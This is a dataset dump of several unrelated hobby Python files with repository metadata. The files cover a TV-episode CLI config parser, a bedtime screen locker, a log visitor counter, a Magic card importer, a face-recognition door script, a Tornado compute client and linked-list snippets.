default=DEFAULT_CACHE_IDS,
help="Read shows ids cache from CACHEIDS.")
group_p.add_option("--with-specials", dest="with_specials", action="store_true", default=False,
help="Print special episodes as well as regular ones.")
group_a.add_option("--calendar", dest="g_calendar", action="store_true", default=False,
help="Update google calendar with episodes broadcast information.")
group_p.add_option("-m", "--no-color", dest="nocolor", action="store_true", default=False,
help="Use monochromatic display. Do not print colors.")
group_p.add_option("-n", "--no-cache", action="store_false", default=True, dest="cache",
help="Do not use caching. ON by default.")
group_p.add_option("-r", "--refresh", action="store_true", default=False, dest="refresh",
help="Force downloading and refreshing cache.")
group_p.add_option("-v", "--verbose", default=False,
action="store_true", dest="verbose")
group_p.add_option("-d", "--debug", default=False,
action="store_true", dest="debug")
group_p.add_option("--no-spinner", action="store_false", default=True, dest="spinner",
help="Do not show spinner while performing network operations.")
group_p.add_option("--print-settings", dest="print_settings_and_exit", action="store_true", default=False,
help="Print settings and exit.")
parser.add_option_group(group_a)
parser.add_option_group(group_p)
parser.add_option_group(group_f)
(options, args) = parser.parse_args()
# Validate parameters:
# --season
if options.season:
if options.season == 'all':
options.season = -1
elif options.season == '0':
options.season = -2
else:
try:
options.season = int(options.season)
except:
parser.error('Invalid season value')
if options.season < -2 or options.season > 1000:
parser.error("Season value not in range 0-1000")
# No cache and refresh?
if not options.cache and options.refresh:
parser.error("--no-cache and --refresh cannot be used together.")
# --episode
if options.episode:
if not options.season:
parser.error("Please use -s <n> to specify season.")
try:
options.episode = int(options.episode)
except:
parser.error('Invalid episode value')
if options.episode < 1 or options.episode > 1000:
parser.error("Episode value not in range 1-1000")
# --when
if options.when:
if options.when.lower() in ['yesterday', 'today', 'tomorrow']:
when_map = {'yesterday': datetime.date.today() - datetime.timedelta(1),
'today': datetime.date.today(),
'tomorrow': datetime.date.today() + datetime.timedelta(1)}
options.when = when_map[options.when.lower()]
elif re.match('[0-9]{4}[-][0-9]{2}[-][0-9]{2}', options.when):
options.when = datetime.datetime.strptime(options.when, '%Y-%m-%d').date()
else:
parser.error('--when - Invalid argument.\nTry: today, yesterday, tomorrow or date in format YYYY-MM-DD')
# Checking for required files
if not os.path.exists(DEFAULT_CONFIG_DIR):
os.makedirs(DEFAULT_CONFIG_DIR)
if not os.path.exists(options.configfile):
open(options.configfile, 'w').close()
if not os.path.exists(options.cachefile):
shelve.open(options.cachefile).close()
if not os.path.exists(options.cacheids):
shelve.open(options.cacheids).close()
return (options, args)
# ---------------------------------------------------------------------
def read_config_file(configfile):
# Default configuration is stored here.
series = []
g_creds = {'login':'', 'passwd':''}
templates = {'list_header_format': '[ %(c_blue)s%(name)s:%(c_red)s Season %(season_no)s%(c_none)s ]',
'list_format': '[%(ep_ident)s] %(ep_title)-25.24s @ %(ep_airdate)s',
'list_format_verbose': 'No: %(ep_epnum)04s [%(ep_ident)s] %(ep_title)-25.24s @ %(ep_airdate)s\n\t\t%(ep_link)s',
'when_day_format': '.. %(when_day)s ..',
'when_name_format': '[ %(c_blue)s%(name)s%(c_none)s ]',
'when_format': '%(ep_airdate)s [%(ep_ident)s] %(ep_title)s',
'single_header_format': '',
'single_format': '%(name)s [%(ep_ident)s] %(ep_title)s.avi',
'info_header_format': '[ %(c_blue)s%(name)s%(c_none)s ]',
'info_verbose_format':
""" Country: %(origin_country)s
Network: %(network)s
Airtime: %(airday)s at %(airtime)s [%(timezone)s]
Runtime: %(runtime)s mins
Class: %(classification)s
Started: %(started)s
Status: %(status)s
Genres: %(genres)s
Seasons: %(totalseasons)s
Episodes: %(totalepisodes)s
Weblink: %(showlink)s
Akas: \n%(akas)s\n""",
'info_prev_format': 'Previous episode: [ %(prev_ep_ident)s ] %(prev_ep_title)-21.20s @ %(prev_ep_airdate)s',
'info_next_format': ' Next episode: [ %(next_ep_ident)s ] %(next_ep_title)-21.20s @ %(next_ep_airdate)s',
'date_format': '%d %h %Y'}
# Read config file and overwrite default values if directives found.
lineno = 0
for line in open(configfile).readlines():
lineno += 1
line = line.strip()
if not line or line.startswith('#'):
continue
try:
key, value = line.split('=', 1)
except IndexError:
sys.stderr.write("Config file corrupted or incorrect. Error at line: %d\n" % (lineno,))
sys.stderr.write("Line: %s\n" % line)
sys.stderr.write("Please refer to README for correct configuration directives\n")
sys.exit(3)
if key == 'series':
if value.endswith(','):
vialue = value[:-1]
if not value:
series = None
else:
series = [el.replace('\n', '') for el in value.split(',')]
continue
if key in ('list_header_format', 'list_format', 'list_format_verbose', 'single_header_format',
'info_verbose_format',
'single_format', 'info_header_format', 'info_prev_format',
'info_next_format', 'date_format',
'when_name_format', 'when_day_format', 'when_format'):
templates[key] = value
continue
if key == 'g_login':
g_creds['login'] = value
continue
if key == 'g_passwd':
g_creds['passwd'] = value
continue
else:
sys.stderr.write("Invalid configuration directive at line %d.\n" % (lineno,))
sys.stderr.write("Line: %s\n" % line)
sys.stderr.write("Please refer to README for correct configuration directives.\n")
sys.exit(3)
return (series, templates, g_creds)
| UTF-8 | Python | false | false | 10,069 | py | 16 | config.py | 11 | 0.558943 | 0.551793 | 0 | 249 | 39.437751 | 130 |
stuart12/python-scripts | 19,602,230,768,430 | 2b544001b41d040807e3c58f396fdb2013972640 | 3632f84661fa31f67c5f82bca36d65a80a12112f | /lockscreen4bed | c63668372d57b42b529b4b76d7c1eaceeae3fc69 | []
| no_license | https://github.com/stuart12/python-scripts | a67acdee4eb1906a4dd732efe1d346e3c6cf38fb | 4b3419587259f33153682376f3f7ca6ad60d7de0 | refs/heads/master | 2023-04-23T03:57:47.439494 | 2023-04-04T21:19:00 | 2023-04-04T21:19:00 | 3,964,348 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
# lockscreen4bed Copyright (c) 2016,2018 Stuart Pook (http://www.pook.it/)
# Lock the screen every 15 minutes when it is time to go to bed.
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import sys
import os
import subprocess
import shlex
def myname():
return os.path.basename(sys.argv[0])
try:
from apscheduler.schedulers.blocking import BlockingScheduler
except ImportError as x:
sys.exit(myname() + ": apscheduler not installed, on Debian do: sudo apt-get install python3-apscheduler")
def verbose(options, level, *message):
if options.verbosity >= level:
print(myname() + ":", *message, file=sys.stderr)
def quote_command(command):
return " ".join(shlex.quote(x) for x in command)
def call(cmd, options=None):
verbose(options, 1, quote_command(cmd))
subprocess.check_call(cmd)
def doit(options=None):
if options.gnome:
call(["xset", "dpms", "force", "off"], options=options)
call(["gnome-screensaver-command", "--lock"], options=options)
else:
call(["light-locker-command", "--lock"], options=options)
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="send me to bed")
parser.add_argument("-v", "--verbosity", action="count", default=0, help="increase output verbosity")
#parser.add_argument("--min_play_time", metavar="SECONDS", type=int, default=9, help="minimum")
parser.add_argument("-m", "--minutes", metavar="MINUTES", default="14,29,44,59", help="minutes in cron format")
parser.add_argument("-H", "--hours", metavar="HOURS", default="0-4,22-23", help="hours in cron format")
parser.add_argument('-g', "--gnome", action="store_true", help="use GNOME lock commands")
#parser.add_argument('urls', nargs=argparse.REMAINDER, help='urls to (permanently) add to the play list')
options = parser.parse_args()
cron = BlockingScheduler()
cron.add_job(doit, kwargs={'options': options}, trigger='cron', hour=options.hours, minute=options.minutes)
cron.start()
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 2,716 | 65 | lockscreen4bed | 65 | 0.702504 | 0.690722 | 0 | 65 | 40.784615 | 115 |
|
teotiwg/studyPython | 5,935,644,813,471 | 2123fecaee96ab4beac288e5ef75de9116ec4c98 | 6a74ae0a776dfa50e946651362ff97326fc9f6e1 | /200/pt5/185.py | 2a8eaf04454ef628d762f9de3583090c3c9ab18d | []
| no_license | https://github.com/teotiwg/studyPython | 799c1307d50ad77a27b8a8ca59c79b79f07c29cd | fd0c7f8af9b0ba9d832818d42aec320386bf857b | refs/heads/master | 2023-02-17T17:04:23.809231 | 2021-01-11T09:27:20 | 2021-01-11T09:27:20 | 327,474,697 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | visitIp = []
with open('access_log', 'r') as f:
logs = f.readlines()
for log in logs:
log = log.split()
ip = log[0]
if ip not in visitIp:
visitIp.append(ip)
print('방문자 수: [%d]' %len(visitIp)) | UTF-8 | Python | false | false | 245 | py | 124 | 185.py | 124 | 0.514768 | 0.510549 | 0 | 11 | 20.636364 | 34 |
ceasaro/magic | 15,470,472,204,530 | f8df275b8125ad52fed3ed6217d49a1d0eb0015c | 5a9db657d4d58704be48a9b3a8e5bb10de01d053 | /web_app/magic/im_export/mtgjson.py | 7a0f30d3ff85125ec458bb43afa29c028a8c8ddc | []
| no_license | https://github.com/ceasaro/magic | b6445f0ab95aa0dcaf0a4c4ad2e7ec9b01eac6e4 | 74d284b08ef2aa29526d63022811808e8ca687be | refs/heads/master | 2023-04-15T17:08:19.163665 | 2023-04-01T13:38:23 | 2023-04-01T13:38:23 | 77,072,334 | 1 | 0 | null | false | 2023-01-12T08:38:14 | 2016-12-21T17:26:04 | 2020-07-30T12:38:52 | 2023-01-12T08:38:14 | 251,919 | 0 | 0 | 22 | JavaScript | false | false | import json
from datetime import datetime
import logging
from magic.core.exception import ManaValidationError
from magic.core.models import Card, Set
logger = logging.getLogger(__name__)
def import_cards(json_data, verbosity=0):
for card_name, card in json_data.items():
try:
new_card, created = create_or_update_card(card)
if verbosity >= 2:
print("{}: {}".format("ADDED" if created else "UPDATED", card_name))
except Exception as e:
print("ERROR import card: {}. Cause {}".format(card_name, e))
raise e
def create_or_update_card(card, set):
new_card, created = Card.objects.update_or_create(
name=card.get("name"),
set=set,
external_id=card.get("id"),
defaults={
"_types": ",".join(card.get("types", [])),
"_subtypes": ",".join(card.get("subtypes", [])),
"_supertypes": ",".join(card.get("supertypes", [])),
"type_line": card.get("type", None),
"text": card.get("text", None),
"mana_cost": card.get("manaCost", "").translate(
{ord(c): None for c in "{}"}
),
"cmc": card.get("cmc", 0),
"_power": card.get("power", 0),
"_toughness": card.get("toughness", 0),
},
)
return new_card, created
def import_sets(json_data, verbosity=0):
for set_name, set_data in json_data.items():
try:
set, set_created = Set.objects.update_or_create(
name=set_data["name"],
code=set_data["code"],
type=set_data["type"],
gathererCode=set_data.get("gathererCode"),
releaseDate=datetime.strptime(set_data["releaseDate"], "%Y-%m-%d"),
)
except Exception as e:
print("ERROR creating set: {}. Cause {}".format(set_name, e))
raise e
i = 0
for card in set_data["cards"]:
i += 1
try:
new_card, created = create_or_update_card(card, set)
except ManaValidationError as mana_e:
logger.warning("Unknown mana for card: {}".format(card))
except Exception as e:
logger.error(
"ERROR import card: {}. Cause {}".format(json.dumps(card), e)
)
raise e
if verbosity >= 2:
logger.info(
"{}: {}".format("ADDED" if created else "UPDATED", card["name"])
)
logger.info("{} cards in set {}".format(i, set_name))
| UTF-8 | Python | false | false | 2,630 | py | 82 | mtgjson.py | 68 | 0.509125 | 0.505703 | 0 | 76 | 33.605263 | 84 |
dreadkopp/activejob_bootstrap | 618,475,328,303 | 7b2757422309e9c8cff3b22b3a058f80efa1c07a | 47e3f13ce4e42fc157db6580154acd3e9a7169d7 | /activejob/activejob/berufsfelder/views.py | d6401d7f826ce04fc7bdb398f0ad68608e03a117 | []
| no_license | https://github.com/dreadkopp/activejob_bootstrap | d266c15565f1371cd9c271de093c9570e0511231 | 8bcdb73f1f95265a06a8e9c751113ccf0cce67eb | refs/heads/master | 2020-12-30T13:40:19.351153 | 2017-08-22T15:48:28 | 2017-08-22T15:48:28 | 91,242,018 | 0 | 1 | null | false | 2017-08-22T15:48:29 | 2017-05-14T12:30:55 | 2017-07-01T19:55:25 | 2017-08-22T15:48:28 | 20,145 | 0 | 1 | 0 | Python | null | null | from .models import Berufsfelder
from core.views import SearchAndMenuDetailView
class BerufsfelderView(SearchAndMenuDetailView):
def dispatch(self, request, *args, **kwargs):
self.active_nodes = {
"top": "bewerber",
"left": "bewerber_" + kwargs["slug"],
"sub": "Berufsfelder",
}
return super().dispatch(request, *args, **kwargs)
model = Berufsfelder
template_name = "web/pages/berufsfelder.html"
| UTF-8 | Python | false | false | 472 | py | 135 | views.py | 72 | 0.631356 | 0.631356 | 0 | 16 | 28.5 | 57 |
gunnarviking/2019_Stockholm_suntory_strong | 11,115,375,388,345 | 8c35ac2f1e8d82e2839c8b386353452c044da2c7 | a029e78f6978410fef96b84db7475afec307c245 | /services/filter_service/filter_service.py | 5c8fce9122f1f8ee914fa6e50e6040d1cb365e5a | [
"MIT"
]
| permissive | https://github.com/gunnarviking/2019_Stockholm_suntory_strong | c29e61f1faba3e21bd4b081b685798975ad00780 | a1fc6e7c1a7317c3cb8bd33a00a0f0bc7fe3e1a7 | refs/heads/master | 2022-12-21T11:22:34.257659 | 2019-11-03T12:25:34 | 2019-11-03T12:25:34 | 219,287,522 | 0 | 0 | null | false | 2022-12-10T07:41:05 | 2019-11-03T11:03:20 | 2019-11-03T12:25:47 | 2022-12-10T07:41:04 | 3,014 | 0 | 0 | 3 | Python | false | false | from common import filter_service_data_collection
from common import filter_service_filter
from common import filter_service_save
def main():
print("main")
filelist = filter_service_data_collection.init()
counter = 0
if filelist is not None:
for file in filelist:
counter+=1
print("counter:",counter)
print("for file", file)
newfile = filter_service_filter.init(file)
if newfile is not None:
filter_service_save.init(newfile, counter)
newfile = None
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 603 | py | 30 | filter_service.py | 13 | 0.605307 | 0.60199 | 0 | 21 | 27.714286 | 58 |
abnerjacobsen/Smart_Office | 16,827,681,880,246 | 61c23d613c2df778a4b2b055841f034b83bc1a61 | 32a4ebfaf311a33dfa0e360c98c9b8c4a95332a5 | /Front_Desk_Facial_Recognition/recognition/recognise.py | 5ba49add017772b21d97a24be8e698e3912288a5 | []
| no_license | https://github.com/abnerjacobsen/Smart_Office | 726b89d1f2fd11c635f18b1d9c57c48bec87842c | 2c0395f916dab94bf4ed96375f0d1b92a53c26a3 | refs/heads/master | 2020-04-26T20:57:40.201495 | 2019-03-02T02:24:15 | 2019-03-02T02:24:15 | 173,827,837 | 1 | 1 | null | true | 2019-03-04T21:57:06 | 2019-03-04T21:57:05 | 2019-03-02T02:24:17 | 2019-03-02T02:24:15 | 1,745 | 0 | 0 | 0 | null | false | null | # USAGE
# With default parameters
# python3 03_recognise.py
# OR specifying the encodings, screen resolution, output video and display
# python3 03_recognise.py -e encodings.pickle -r 240 -o output/capture.avi -y 1
## Acknowledgement
## This code is adapted from:
## https://www.pyimagesearch.com/2018/06/18/face-recognition-with-opencv-python-and-deep-learning/
"""This module is used to encode images into an encodings.pickle file for face recognition to reference from"""
# import the necessary packages
from imutils.video import VideoStream
import face_recognition
from sense_hat import SenseHat
import argparse
import imutils
import pickle
import time
import cv2
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-e", "--encodings", default='/home/pi/Assignment_Two/Front_Desk_Facial_Recognition/recognition/encodings.pickle',
help="path to serialized db of facial encodings")
ap.add_argument("-r", "--resolution", type=int, default=240,
help="Resolution of the video feed")
ap.add_argument("-o", "--output", type=str,
help="path to output video")
ap.add_argument("-y", "--display", type=int, default=0,
help="whether or not to display output frame to screen")
ap.add_argument("-d", "--detection-method", type=str, default="hog",
help="face detection model to use: either `hog` or `cnn`")
args = vars(ap.parse_args())
#prepare sensehat and sensehat data
SenseHat = SenseHat()
g1 = [0, 150, 0]
g2 = [0, 255, 0]
r = [255, 0, 0]
o = [0, 0, 0]
loading = [
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1
]
working = [
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2
]
failed = [
o, r, r, r, r, r, o, o,
o, r, r, r, r, r, o, o,
o, r, r, o, o, o, o, o,
o, r, r, r, r, o, o, o,
o, r, r, r, r, o, o, o,
o, r, r, o, o, o, o, o,
o, r, r, o, o, o, o, o,
o, r, r, o, o, o, o, o,
]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def recognise():
"""This function is responsible for using the camera to recognise the
person standing infront of the device. Returns the recognised persons
name."""
#keep track of attempts. Too many attempts will trigger a return.
attempts = 0
# load the known faces and embeddings
print("[INFO] loading encodings...")
data = pickle.loads(open(args["encodings"], "rb").read())
# initialize the video stream and pointer to output video file, then
# allow the camera sensor to warm up
#Using a for loop to loop through devices, as a precaution to
#system related issues, whereby a resource might be allocated a different
#device number for various reasons.
print("[INFO] starting video stream...")
for x in range(0, 2):
for x in range(0, 20):
vs = VideoStream(src=x).start()
if str(vs.read()) != "None":
break
if str(vs.read()) != "None":
break
writer = None
#Faint green to indicate starting process
SenseHat.set_pixels(loading)
time.sleep(2.0)
# loop over frames from the video file stream
while True:
SenseHat.set_pixels(working)
if attempts >35:
SenseHat.set_pixels(failed)
time.sleep(1.5)
SenseHat.clear()
cv2.destroyAllWindows()
vs.stop()
return {'code' : 400}
attempts += 1
# grab the frame from the threaded video stream
frame = vs.read()
# convert the input frame from BGR to RGB then resize it to have
# a width of 750px (to speedup processing)
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
rgb = imutils.resize(frame, width=args["resolution"])
r = frame.shape[1] / float(rgb.shape[1])
# detect the (x, y)-coordinates of the bounding boxes
# corresponding to each face in the input frame, then compute
# the facial embeddings for each face
boxes = face_recognition.face_locations(rgb,
model=args["detection_method"])
encodings = face_recognition.face_encodings(rgb, boxes)
names = []
# loop over the facial embeddings
for encoding in encodings:
# attempt to match each face in the input image to our known
# encodings
matches = face_recognition.compare_faces(data["encodings"],
encoding)
name = "Unknown"
# check to see if we have found a match
if True in matches:
# find the indexes of all matched faces then initialize a
# dictionary to count the total number of times each face
# was matched
matchedIdxs = [i for (i, b) in enumerate(matches) if b]
counts = {}
# loop over the matched indexes and maintain a count for
# each recognized face face
for i in matchedIdxs:
# name = data["names"][i].split("-")[0].replace("_", " ")
name = data["names"][i]
counts[name] = counts.get(name, 0) + 1
# determine the recognized face with the largest number
# of votes (note: in the event of an unlikely tie Python
# will select first entry in the dictionary)
name = max(counts, key=counts.get)
# update the list of names
names.append(name)
# loop over the recognized faces
for ((top, right, bottom, left), name) in zip(boxes, names):
# rescale the face coordinates
top = int(top * r)
right = int(right * r)
bottom = int(bottom * r)
left = int(left * r)
# print to console, identified person
personFound = 'Person found: {}'.format(name)
print(personFound)
cv2.destroyAllWindows()
vs.stop()
# check to see if the video writer point needs to be released
if writer is not None:
writer.release()
SenseHat.clear()
cv2.destroyAllWindows()
vs.stop()
return {'code' : 200, 'identified' : name}
# if the video writer is None *AND* we are supposed to write
# the output video to disk initialize the writer
if writer is None and args["output"] is not None:
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
writer = cv2.VideoWriter(args["output"], fourcc, 20, (frame.shape[1], frame.shape[0]), True)
# if the writer is not None, write the frame with recognized
# faces to disk
if writer is not None:
writer.write(frame)
# check to see if we are supposed to display the output frame to
# the screen
if args["display"] > 0:
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
# check to see if the video writer point needs to be released
if writer is not None:
writer.release()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Run Program
if __name__ == '__main__':
recognise() | UTF-8 | Python | false | false | 8,348 | py | 66 | recognise.py | 16 | 0.537973 | 0.512099 | 0 | 224 | 36.272321 | 130 |
luisrs/MmodMMGBSA | 4,114,578,704,261 | 8629f86e1c357d7ad9cc77fd69a0ce6092639464 | c6b91581f08ca963d215dd02cbc80ba53bfe6bca | /fatools/fatools/utils/validation/validations/presence.py | a4fe81fb1668740e615ffa9364f4d8e3fcc44c78 | []
| no_license | https://github.com/luisrs/MmodMMGBSA | c454ffa94ec358f0252dea6dab2f62b798ce26f7 | 73b8252fe7144f763b051c6745097c0418de4244 | refs/heads/master | 2021-01-10T07:38:41.978439 | 2016-02-14T00:04:08 | 2016-02-14T00:04:08 | 43,270,633 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fatools.utils.validation.validator import FieldValidator
class PresenceValidator(FieldValidator):
"""Validates that the specified field is present (not None)."""
err_template = "'{name}' is missing"
def validate_field(self, name, value):
if value is None:
raise self._construct_error(name, value)
return True
| UTF-8 | Python | false | false | 358 | py | 79 | presence.py | 79 | 0.684358 | 0.684358 | 0 | 12 | 28.833333 | 67 |
ZainQasmi/LeetCode-Fun | 17,162,689,326,833 | f794ae5a1ff293457b8f3ad30e2f9f137e8ac258 | 1777a2d56daf94d3cbbf99d4a6723fa39dc65488 | /Amazon/quora1.py | 4b26a6a1b1a53fbb20f1f5f817b9ed9c777e6eb8 | []
| no_license | https://github.com/ZainQasmi/LeetCode-Fun | ab390f5d23e71f6b8c173fb55826d8885f968a7d | 1be106af08624cc0653be5df4dc41184356dfa0c | refs/heads/master | 2020-04-19T15:01:31.226811 | 2019-08-01T08:05:55 | 2019-08-01T08:05:55 | 168,262,028 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Node:
def __init__(self, next=None, prev=None, data=None):
self.next = next # reference to next node in DLL
self.prev = prev # reference to previous node in DLL
self.data = data
# Adding a node at the front of the list
def push(self, new_data):
# 1 & 2: Allocate the Node & Put in the data
new_node = Node(data = new_data)
# 3. Make next of new node as head and previous as NULL
new_node.next = self.head
new_node.prev = None
# 4. change prev of head node to new node
if self.head is not None:
self.head.prev = new_node
# 5. move the head to point to the new node
self.head = new_node
# This code is contributed by jatinreaper
# Given a node as prev_node, insert
# a new node after the given node
def insertAfter(self, prev_node, new_data):
# 1. check if the given prev_node is NULL
if prev_node is None:
print("This node doesn't exist in DLL")
return
#2. allocate node & 3. put in the data
new_node = Node(data = new_data)
# 4. Make next of new node as next of prev_node
new_node.next = prev_node.next
# 5. Make the next of prev_node as new_node
prev_node.next = new_node
# 6. Make prev_node as previous of new_node
new_node.prev = prev_node
# 7. Change previous of new_node's next node */
if new_node.next is not None:
new_node.next.prev = new_node
# This code is contributed by jatinreaper
# Add a node at the end of the DLL
def append(self, new_data):
# 1. allocate node 2. put in the data
new_node = Node(data = new_data)
last = self.head
# 3. This new node is going to be the
# last node, so make next of it as NULL
new_node.next = None
# 4. If the Linked List is empty, then
# make the new node as head
if self.head is None:
new_node.prev = None
self.head = new_node
return
# 5. Else traverse till the last node
while (last.next is not None):
last = last.next
# 6. Change the next of last node
last.next = new_node
# 7. Make last node as previous of new node */
new_node.prev = last
# This code is contributed by jatinreaper | UTF-8 | Python | false | false | 2,435 | py | 83 | quora1.py | 67 | 0.570842 | 0.563039 | 0 | 85 | 27.647059 | 61 |
slyfrs/aldryn-wordpress-import | 8,607,114,475,732 | 9b3e2f2feb1d180b200e73df07894a8e66888a9d | 8184104b7f42534ae454b5187bb755ffbdfffbd9 | /aldryn_wordpress_import/factories.py | 7da6a21c863c5b302330360e8ac86d144682e1e3 | [
"BSD-3-Clause"
]
| permissive | https://github.com/slyfrs/aldryn-wordpress-import | 3c26947d4a24221e9ec429b4f77e3292fbd0173e | aac70f6a70e1c6544f10e54e500cf6eba73a0b16 | refs/heads/master | 2021-05-08T13:43:24.949380 | 2015-07-09T12:21:29 | 2015-07-09T12:21:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.template.defaultfilters import truncatewords_html
from aldryn_blog.models import Post
from cmsplugin_filer_image.models import FilerImage
from djangocms_text_ckeditor.models import Text
def create_post(post_data, parts):
try:
first_part = parts[0]
except IndexError:
first_part = post_data['title']
post_with_slug = Post.objects.filter(slug=post_data['slug'])
if post_with_slug.exists():
raise ValueError('Slug is not unique')
post = Post(
title=post_data['title'],
slug=post_data['slug'],
lead_in=truncatewords_html(first_part, 55),
publication_start=post_data['publication_start'],
author=post_data['user'],
language=post_data['language'],
)
post.save()
return post
def create_filer_plugin(filer_image, target_placeholder, language):
image_plugin = FilerImage(image=filer_image)
image_plugin.position = 0
image_plugin.tree_id = 0
image_plugin.lft = 0
image_plugin.rght = 0
image_plugin.level = 0
image_plugin.plugin_type = 'FilerImagePlugin'
image_plugin.language = language
image_plugin.placeholder = target_placeholder
image_plugin.save()
return image_plugin
def create_text_plugin(content, target_placeholder, language):
text = Text(body=content.decode('utf-8'))
text.position = 0
text.tree_id = None
text.lft = None
text.rght = None
text.level = None
text.language = language
text.plugin_type = 'TextPlugin'
text.placeholder = target_placeholder
text.save()
| UTF-8 | Python | false | false | 1,572 | py | 9 | factories.py | 5 | 0.676209 | 0.669847 | 0 | 53 | 28.660377 | 67 |
Veallym0n/KPark | 18,073,222,414,369 | bbc575d5413abc7ab75fefd3a9b4dd771c5cdaa3 | 3532e8d0ec55b540ab13c39c0dbacc57d45a6314 | /Client.py | 938ded2b09af66881d5f9726dab842ac84c2b5c9 | []
| no_license | https://github.com/Veallym0n/KPark | cb1f40a87f3c73013ebda2d4dfedf119bd091029 | 207dcc13cdd8a9f946dba129d545f38f37cef9d5 | refs/heads/master | 2020-06-02T12:56:53.808332 | 2015-06-30T03:36:38 | 2015-06-30T03:36:38 | 38,103,645 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from tornado import tcpclient, gen, ioloop
import traceback
import rdd
import util
from collections import deque
from pdb import set_trace as st
class TCP(object):
def __init__(self,host,port):
self.host = host
self.port = port
self.client = tcpclient.TCPClient()
self.stream = None
self.task_queue = []
self.result_queue = []
self.compute_queue()
self.report_queue()
@gen.coroutine
def connect(self):
try:
self.stream = yield self.client.connect(self.host,self.port)
except Exception,e:
print "WARNING: Could not connect Master ..."
ioloop.IOLoop.instance().call_later(1,self.connect)
else:
self.stream.set_close_callback(self.on_close)
self.register()
self.read()
def on_close(self):
print 'WARNING: Master: Closed'
if self.stream.closed():
ioloop.IOLoop.instance().call_later(1,self.connect)
@gen.coroutine
def read(self):
try:
if self.stream:
data = yield self.stream.read_until('\r\n')
data = data[:-2]
self.task_queue.append(data)
except Exception,e:
self.stream.close()
ioloop.IOLoop.instance().add_timeout(0,self.read)
def rdd_compute(self, data, dependencies):
rd = rdd.RDD(data)
rd.dependencies = dependencies
return rd.compute()
def compute_queue(self):
if self.task_queue:
try:
taskid, data ,dependencies = util.unserial(self.task_queue.pop(0))
result = (taskid, self.rdd_compute(data, dependencies))
self.result_queue.append(result)
except Exception,e:
print 'Compute Err',e
traceback.print_exc()
ioloop.IOLoop.instance().add_timeout(0,self.compute_queue)
def report_queue(self):
if self.result_queue:
result = self.result_queue.pop(0)
self.write(util.serial(result))
ioloop.IOLoop.instance().add_timeout(0,self.report_queue)
@gen.coroutine
def register(self):
try:
yield self.write(util.serial({"Register":True}))
except Exception,e:
print 'register',e
@gen.coroutine
def write(self,data):
try:
yield self.stream.write(data+'\r\n')
except Exception,e:
print 'write',e
def init():
client = TCP('127.0.0.1',8141)
client.connect()
if __name__=='__main__':
init()
| UTF-8 | Python | false | false | 2,621 | py | 6 | Client.py | 5 | 0.563144 | 0.556276 | 0 | 100 | 25.21 | 82 |
ViegasAdilson/Python | 16,879,221,481,036 | 1ca7423c655bd2093b607a8467eb2ffe92c72f9f | d504bbb14739aef710111e4ae5360c1a2d726154 | /projetoEcommerce/pedido/views.py | c02e8cbfddb6314fd14438abfd57bdc7d2b75012 | []
| no_license | https://github.com/ViegasAdilson/Python | 5190655e23dccf2d293c19fa55903df147e66950 | 61e44184ec135b7d55490834c3e468fa72da9656 | refs/heads/master | 2023-04-05T07:40:36.171222 | 2021-04-07T11:20:23 | 2021-04-07T11:20:23 | 355,515,206 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.shortcuts import render
from django.views.generic import ListView
from django.views import View
# Create your views here.
class Pagar(View):
pass
class FecharPedido(View):
pass
class Detalhe(View):
pass | UTF-8 | Python | false | false | 230 | py | 75 | views.py | 68 | 0.756522 | 0.756522 | 0 | 14 | 15.5 | 41 |
tzahishimkin/extended-hucrl | 9,698,036,169,772 | fc5d76b3799b1d363bf201feef95d596f3c0161e | 66c7b0da6ee27ddce0943945503cdecf199f77a2 | /rllib/agent/random_agent.py | c34450a48b8f3563c446b16997c3081c0c8c5d90 | [
"MIT"
]
